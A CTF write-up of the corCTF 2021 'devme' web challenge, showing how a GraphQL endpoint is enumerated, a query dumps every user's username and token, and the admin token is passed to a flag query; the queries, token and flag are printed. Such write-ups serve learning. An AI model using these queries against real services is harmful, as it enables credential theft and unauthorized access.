devme corCTF Web challenge writeup
introduction
Hello guys back again with another tutorial this time am going to be showing you how i solved devme challenge from corCTF 2021. You are given a web page and performing manual enumeration reveals its running graphql under the hood. The graphql endpoint when passed an email address it creates a user with a sha256 hash. We later on find that we can then run three different queries
- Mutation query which basically allows us to add a user to the database
- the graphql also allows the user to query all users with their corresponding token from the data stored
- Lastly there is a flag query which if given the correct token (admin’s token) it will leak flag.
Without much say let’s jump in.
We have been given the following URL
https://devme.be.ax/On opening we get a standard web page
The first enumerations that i usually run are
- A directory brute force using gobuster(you can use ffuf, ferobuster or even wfuzz depending on your liking)
2. A vulnerability scan using nikto
While they were running i decided to poke at the website and see what functionality it had
The web application allows a user to signup to get a free preview of a book
So i decided to signup using a fake email address and see if the form had any functionality the intercepted the request using burpsuite
Looking the screenshot of the intercepted request we see a couple of interesting information
The website has a graphql endpoint and its using mutation operations to create a user using the email address provided by the user. Mutations are GraphQL operations that can modify back-end data (unlike queries) in our case the operation is to adding a user to the backend system
The user created has a sha256 hash as the username
The next thing we could do is query the schema to see how much functionality we have. But am going to show a really awesome tool that does all the tedious work for you and show you the operation you are allowed to perform on the graphql API. The tool is called graphql-playground.
First download the appimage from GitHub and make it an executable and open it from your terminal.
Once the application has been opened. Click on the URL endpoint
Then input the graphql endpoint URL and click open
A new window will open where you can run your queries
Looking at the schema we can run 3 queries as i explained before
First i ran the user operation and queried the API for both username and tokens for each respective users
The query that i used was
query{users{username, token}}Looking at the screenshot below i was able to dump all the usernames with their respective tokens
We are only interested on the admin’s token since it’s the one that will give us the flag
Next i ran the second query that is used to retrieve the flag. The query used was
query{flag(token:"3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b")}And looking the screenshot below we are able to retrieve the flag
which is
corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}And that’s it for the challenge. This tutorial just touched the basics of graphql I’ve seen SQL Injections, command injections etc exploited from graphql take time and read it. But till the next time, It’s goodbye. If you liked the walkthrough don’t forget to clap for me down below and follow me so that you won’t miss any upcoming walkthrouhgs